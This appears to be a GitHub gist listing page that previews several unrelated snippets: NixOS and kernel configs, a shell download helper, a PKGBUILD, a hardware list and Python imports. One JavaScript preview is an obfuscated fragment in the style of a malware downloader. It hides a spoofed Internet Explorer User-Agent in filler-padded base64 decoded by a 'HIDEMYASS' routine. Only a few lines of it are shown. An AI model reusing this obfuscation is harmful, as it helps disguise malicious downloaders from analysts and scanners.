This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
import os | |
import re | |
import shutil | |
import argparse | |
import subprocess | |
import time | |
from pathlib import Path |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Edit this configuration file to define what should be installed on | |
# your system. Help is available in the configuration.nix(5) man page | |
# and in the NixOS manual (accessible by running ‘nixos-help’). | |
{ config, pkgs, ... }: | |
{ | |
imports = | |
[ # Include the results of the hardware scan. | |
./hardware-configuration.nix |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Edit this configuration file to define what should be installed on | |
# your system. Help is available in the configuration.nix(5) man page | |
# and in the NixOS manual (accessible by running ‘nixos-help’). | |
{ config, pkgs, ... }: | |
{ | |
imports = | |
[ # Include the results of the hardware scan. | |
./hardware-configuration.nix |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# CONFIG_SPARSEMEM_VMEMMAP is not set | |
CONFIG_LOG_CPU_MAX_BUF_SHIFT=13 | |
CONFIG_CGROUP_DEBUG=y | |
CONFIG_SCHED_AUTOGROUP=y | |
CONFIG_ARCH_SOPHGO=y | |
CONFIG_ERRATA_THEAD=y | |
CONFIG_SCHED_CLUSTER=y | |
CONFIG_NR_CPUS=128 | |
CONFIG_NUMA=y | |
CONFIG_NUMA_BALANCING=y |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CONFIG_AIC8800_WLAN_SUPPORT=m | |
CONFIG_AIC_LOADFW_SUPPORT=m | |
CONFIG_AIC_WLAN_SUPPORT=y | |
CONFIG_ATA=y | |
CONFIG_AUTOFS4_FS=y | |
CONFIG_AFS_FS=m | |
CONFIG_AFS_FSCACHE=y | |
CONFIG_BACKLIGHT_CLASS_DEVICE=y | |
CONFIG_BINFMT_MISC=y | |
CONFIG_BLK_DEV_DM=m |
- Asus ROG Ally : https://rog.asus.com/gaming-handhelds/rog-ally/rog-ally-2023
- Steam Deck : https://store.steampowered.com/steamdeck
- HX90 : https://store.minisforum.com/products/hx90
- Aya Neo 2021 : https://www.ayaneo.com/goods/6781273145498
- PN50 : https://www.asus.com/displays-desktops/mini-pcs/pn-series/mini-pc-pn50
Games | Version | Tweaks | Issue | Hardware |
---|
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh -eu | |
# Make sure we have wget or curl | |
check_curl_wget(){ | |
if command -v wget >/dev/null 2>&1; then | |
DL="wget -O-" | |
DL_SL="wget -qO-" | |
elif command -v curl >/dev/null 2>&1; then | |
DL="curl -L" | |
DL_SL="curl -s" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function setRH(CR, VR){ | |
CR[VR]("User-Agent", "TW96aWxsYS80LjAgPARTITIKGNvbXBhdGlibGU7IE1TSUUgNi4wOyPARTITIBXaW5kb3dzIE5UIDUuMCk=".HIDEMYASS()); | |
} | |
var SmthngWrngfibre_SayNoNo ="PARTITI"+ ""+""; | |
var silkopil = "/"; | |
var efFFFFF =0xff ; | |
var line5 = new Array( |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Maintainer: Alex Tharp <[email protected]> | |
# Original Maintainer: Muratcan Sisek <[email protected]> | |
pkgname=hiri | |
pkgver=1.4.0.1 | |
pkgrel=1 | |
pkgdesc="A cross-platform, Exchange-ready email client aiming to replace Outlook" | |
arch=('x86_64') | |
url="https://www.hiri.com/" | |
license=('custom') | |
provides=('hiri') |
NewerOlder